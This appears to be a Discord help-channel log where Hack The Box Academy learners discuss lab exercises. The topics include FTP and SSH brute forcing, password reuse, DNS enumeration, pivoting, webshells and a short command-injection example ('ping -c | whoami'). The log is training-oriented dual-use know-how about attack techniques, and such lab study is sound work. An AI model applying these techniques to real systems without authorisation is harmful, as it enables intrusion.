That’s okay

no it isn't, you didn't give permission

As a matter of fact, you’re right.

Better start a defensive course now

totally not an alt guys

lol what the heck

Okay one moment lol

hi guys is there any problem with the academy? i have issue with spawning targets

i just tried to spawn a random machine and it worked for me

try ctrl + shift + r then spawn again

i tried to refresh before

now this worked but how!!!

i wasted 5hours today :<

because it's a hard refresh that clears the cache and completely redownloads the page

normal refresh doesn't clear the cache

nice thank u

now don't use hard refresh to hack donald trump without permission

try password in single quotation marks '

can you ping the target

what module and did you just reset it

ok when did you click spawn now

how long was it before you spawned the target and ran that command

try with remmina

ok then it's most likely because you changed vpn's.

despawn the target, disconnect from the vpn, re-download the vpn file, reconnect to the vpn, hard refresh the section (ctrl shift r) then respawn the target

then wait ~3-5 mins for the environment to spawn

Hey im in the exploiting web vulns in thick client section and im trying to rebuild a jar file after i edited someting in it but im getting an error anybody knes what to do

I think you need to compile ClientGuiTest.java

Mm but i edited in invoker.java file

windows + shift + s, then you can ctrl v the pic

bro is hardworking guy

yes, you need to edit the Invoker.java (change the config folder name)
then compile the ClientGuiTest.java

What

I dont understand im sry

Nice got sick when I was having good progress

someone can help me?

i hava txt file, but have noting

it has 4kb and flag

i cant find

wdym

what module

its a homework

hahahaha

trust me bro, its a college homework

this channel is about the academy modules so no one can help you with homework here

hdd

lol

nah bro

This isn’t a channel to have fun and post emojis in. Read the #rules

💀

what do I do then?

you deleted my hard work

Read the rules and #welcome

This isn’t a channel for emojis. Read the channel description

type shi

that wasnt very welcoming as a new member

As a new member of a community, one should read the rules and be a good member and obey them 😉

npc behavior

ok, but is that server suposed to be? corresponding to the title and description, it looks like a place to learn hacking, is it?

i mean he said read #welcome and #rules if you did that you'd know more. this discord is about the hackthebox platform, this channel specifically the academy platform

Yes. Read #welcome and you will understand more about the server and what it is about

ok

yeah totally what I need to learn

Just also know that you need to be 18 or have parental consent to create an account.

discord account?

Hack the Box account

I will look foward into that

Awesome

Hi,
working on the medium lab of Footprinting
I have been stuck after getting acces to the SQL Management thing directory that i guess is the MSQL that the hint is talking about, but I believe it is not externally acessible since it is not discovered by port scans
Am I supposed to download the whole folder and open it localy as if I installed it to explore it ?
It is the sole idea that I have this far and got quite stuck for a long time
Any hint ?

there’s a hint in that section iirc

ye that is talking about some obscure MSQL app running
i found what i believe to be credentials for sys admin, but I am wondering how am i supposed to connect to this service since it not running on any external port

To be honest, this server isn't really what I'm looking for after reading the welcome thing because its more for professional stuff, I found that server in the gaming category, which is why I'm here

Ah, I see. The main platform is “gamified”. But yes, the Academy has great content to learn

then the server is running internally and ig you already rdpd in

But good point 🙂

Alright then, see yall around...

Take care 👋

What a gamer

He’s unspawned himself

Are any remote services running on any ports, i.e. RDP?

yes man, and for some reason i got lost in my running services and connected to everything else except this

Cool deal.

would there be any reason the password found for the sys admin account fails to log in SQL Server ? (bad grammar english is not my primary lang)

What are some things people do with multiple accounts and passwords.

reuse passwds i guess

Would be worth a shot.

I'm working through the Password Attacks module, but am struggling to get Will's password in the Credential Hunting in Linux exercise. I saw the hint and have tried to brute force FTP & SSH with Kira using the provided password list and a mutated list that mutated the password in the hint. I also tried brute forcing FTP & SSH with Will using the provided password list. I am able to login to the IPC$ share with Kira's account, but there's nothing there and Kira's account doesn't have permission to the SHARE share. What am I missing?

i must be doing something wrong
but i figured out an admin user on the machine, and try to connect to rpc with it but no password worked
is it because I use xfreerdp ? (weird because it worked for the other user)

Hey shoot me a DM so I can see what your looking at and whatnot.

thanks man, rn

hello, in the attacking password hard lab, i found the pass for d** and went to his share but when trying to download the b.vhd file it downloads it but the file is 0bytes

is there any other way to get that file?

rdp and evil winrm with this user isnt working

u didnt transfer the whole file

yes it is giving an error when getting it

something in the lines of this is too big to download

i cant remember what logon services there were, but i remember using powershell and python ftp to get it

dm a pic

idr if there's a timeout switch in of smbclients

niceo!

it was -t

Good evening guys, anybody there for a few questions concerning Attacking DNS ?
I've exhausted all my ideas 😄

if you want to get help , you should mention which module/section you are working on , and what have you tried

I'm doing Attacking Common Services > Attacking DNS.
I'm kinda lost. Given that we have the records that we wanna query and the ns is given from the target's ip, I've tried a few things without success.
Zone Transfer, leads to transfer failed.
Enumeration, subbrute goes in error if I add this nameserver to the resolvers. Subfinder, does not return anything

I must admit that I still have some fog in my head trying to wrap up the DNS concept, not as a concept itself, more from the results being returned from a dig query, for instance.
When I dig ns @ip inlanefreight.htb, does it mean I'm basically reading the /etc/hosts file of that ipaddress and looking for the inlanefreight.htb ns refs ?

Did you use subbrute

With the name server as the only ip in the resolvers file

I was using the ns record

ns.inlanefreight.htb

my god, it is not returning errors now, I guess it was due to that

Yeah, you don’t need the FQDN to use the name server

but why doesn't subbrute works with the FQDN as well?

It should if u added it to your /etc/hosts

goddamn

But it’s not needed

definitely need to make some DNS-related exercises

pwend!
i was expecting some pth/ptt tbh

thank you very much btw 🙂

good evenings I'm stuck with the following question: For your next hop, list the networks and then use a common remote access solution to pivot. Send the C:\Flag.txt located on the workstation. I have the base Sam but nose how to copy this to my attacking machine module Pivoting, Tunneling, and Port Forwarding

following the reading for HTTPS module in cracking into htb curl -k https://inlanefreight.com which is the command shown in the article produces nothing to the terminal but curl -k https://www.inlanefreight.com whats going on?

also does my pwnbox save its state across instances if i create folders and files?

when i connect with netcat the first lines about banner right ? and the administrator he can change it ?

yeah the first lines are usually a banner with a version number

ive seen the banner changed to different things sometimes too

a lot of port fowarding

Hey guys im doing the file transfer module, do you know why i cant do the transfer here? i do the same then the explication?

Read the error message - were you told to use a specific option somewhere?

Yeah i know that it dont reconize the -Post argument but when i took a look again on htb and asked gpt it give me both the same but it dont work

Where do you see the -Post argument in Academy out of interest?

hm

need to be updated maybe?

Did you type out the command by hand, or copy paste?

hand

and the commande is the same from lolbas

Weird, I don't get that error here

Oh

You're in Powershell

yes

The example shows in a Command Prompt

I wonder if there is a difference in PS compared to CMD, sounds weird, but just a thought

https://academy.hackthebox.com/module/67/section/640 Hey guys, im working on the first question: i found a bunch of passwords but apparently those arent the right ones; can i get a hint?

I don't see the -Post argument in the documentation on Windwos though

..but here locally I see it

im trying to in cmd but its not working

Oh, I've not pulled the binary from lolbas

Could you raise the issue in #1234357888114364508 please?

Seems something odd is going on for sure

Oh nvm

If you get an error when running certreq.exe, the version you are using may not contain the -Post parameter. You can download an updated version here and try again.

okej wil do it lolbas should update it to

That's below the example

oooh yeahh okej wait

nice exercice im gonna try to transfer the exe from my attack host to target host

anyone?

Hey Peeps, I'm working through the Password Attacks module, but am struggling to get Will's password in the Credential Hunting in Linux exercise. I saw the hint and have tried to brute force FTP & SSH with Kira using the provided password list and a mutated list that mutated the password in the hint. I also tried brute forcing FTP & SSH with Will using the provided password list. I am able to login to the IPC$ share with Kira's account, but there's nothing there and Kira's account doesn't have permission to the SHARE share. What am I missing?

the description for the Host header reads as:

    Used to specify the host being queried for the resource. This can be a domain name or an IP address. HTTP servers can be configured to host different websites, which are revealed based on the hostname. This makes the host header an important enumeration target, as it can indicate the existence of other hosts on the target server.

but how can it indicate the existence of other hosts?

how long did you wait for the ftp attack?

they also gave you kiras password already, so u could try and make variations of that

Fuzzing

something ill learn about later?

yes, when you come across vhosts

have you yet?

no, im just starting

which module

cracking into HTB

depends on what path you will be taking next, but ik that they cover vhosts in "Web Fuzzing" and "Attacking Web Applications with FFUF"

also, "Information Gathering - Web Edition"

havent fully planned that out, my current thinking was Cracking into HTB -> Basic Toolset -> OS Fundamentals, and then go from there

sounds good, they go over it in Basic Toolset

just finished web service and API attacks, it seem like there's an unintended path for the skills assessment?

Until it finished. I did a mutation of Kira's that didn't work

hello guys
on Attacking Common Services
Attacking FTP

for ftp?

i am trying to bruteforce the ftp using medusa

it's returning error

Yep

u def shouldve got a hit

did you put the exact password in a file then mutate it

Yep

Weird, right?

yeah, it worked for me

its not on port 21 @fickle topaz

yea its on p 2121, but i dont know what to do again

just switch the port number

how

what about that?

change the port number on hydra

<@&861185840277487616> looks like one

in nmap moudle Firewall and IDS/IPS Evasion - Medium Lab

what does mean this

http://<target>/status.php
Recorded alerts: 49 / 100 alerts

Refresh Page (button)

i thinks thats how many alerts they got from your nmap

you get locked out for 3 minutes if maxed out

ty

Im so confused reading this whats the rule break? Explaining the module?

got deleted

hello it's normal these 3 technique enumerate here does'nt work ? https://academy.hackthebox.com/module/67/section/627

except for the first one, but when I take the administrator hash to connect with evil-winrm it doesn't work.

here have got a shell with meterpreter but the commande guid does'nt work

Hi - can I get pointer for the the academies - firewall and ids / ips nmap hard lab - i can only see 2 ports open but can’t find the answer to the question not even with the hint

do a full port scan on both tcp and udp 😉

Was literally just about to start the udp scan 😅

Anyone able to give any hint for question 3 about the API key on information gathering web edition skills assessment? None of the wordlists in seclists are producing any results

why this injection works? | whoami on a direct command injection?

try any command | whoami on your machine

sorry! i mean ping -c | whoami is working and giving me the whoami command in a command injection

yeah it will work

hm ok let me try

this how bash works

yes sorry i didnt see the sense but it actually works ty

Does anyone have any clues to solve Firewall and IDS/IPS Evasion - Hard Lab?

Hey guys

Everything you need is in that last section.

Pc o laptop

For what

Work games VMware etc

If you will use the device at the same place all the time, I’d go for a desktop

desktop is better , but that's if you don't move too much

i got confused in smb enumeration some extra resouce which can help me here

if netbios is used for hostname resolution and hostname registration why i see microsoft-ds as a service name in nmap scan on port 139 . this is a part of netbios API which provides network services like file and printer sharing but wait a min we are using smb for this perpose so why the hell i see that

someone helping me here ???????🙂

same question. anyone can hint?

which module, section?

footprinting module in smb section

lemme look up, wait a minute

which task is it?

there is no nmap scan i was saying this as i see a lot of time microsoft-ds on port 139 . no there is no exercise or que just my doubt

The webshell section with the laudanum aspx shell. First of all, uploading and accessing an aspx-shell on pwnbox didn't work, got 404 however I tried accessing it. Connected with vpn from Kali and still 404. When switching || to another aspx webshell, not laudanum specifically, || it worked to get the shell access. So far so good. But the question 2, even copy/paste, the entire path from pwnbox, and I get wrong answer 😱 I love your course, but these kind of questions slows the learning process up, have to spend to much time just getting past a qustion that is not technical, not fruitful, just annoying. How to bypass this since not even correct answer is ok???

"microsoft-ds" on port 139 is common for Windows file sharing. i dont think you should be concerned about it.

https://myitgeneralist.blogspot.com/2018/09/importing-exploit-db-exploits-into.html

You are making it difficult for yourself. I am certain you didn't edit and add your IP.

SMB runs on port 445 + 139. It used to run on NetBIOS only (port 139), however, latest windows version run on 445. For backward compatibility you will see that SMB runs on 139 as well.

Plus you are most likely confused about the path which they are asking for. Upload the shell again and keep your eyes open to observe the changes.

why does it matter on first place what port the service is running we can assign different ports to different services only few port are not changeable which are absolute kind (ICMP, BGP, DHCP, DNS, NTP) or maybe few more

how sure are you?

that is definitely an issue on your end. I just did xfreerdp and it was working

have you tried remmina?

ohhhhh. try resetting your vpn config?

try remmina

there is rdesktop too

or krdc

or vinagre

but i think first 2 should work

1. no, not at all thank you. 2. they ask for the path 'on the pwnbox' which I interprete as the file path to the shell on the file system of the pwnbox. Which not work as an answer. So the question is not about the shell itself, or access to the remote host, it's solely related to the q2, which asks for the path on the attack box

is that even running?

oh sorry I got the path confused 🤦‍♂️. which path have you tried?

try ping that ip and port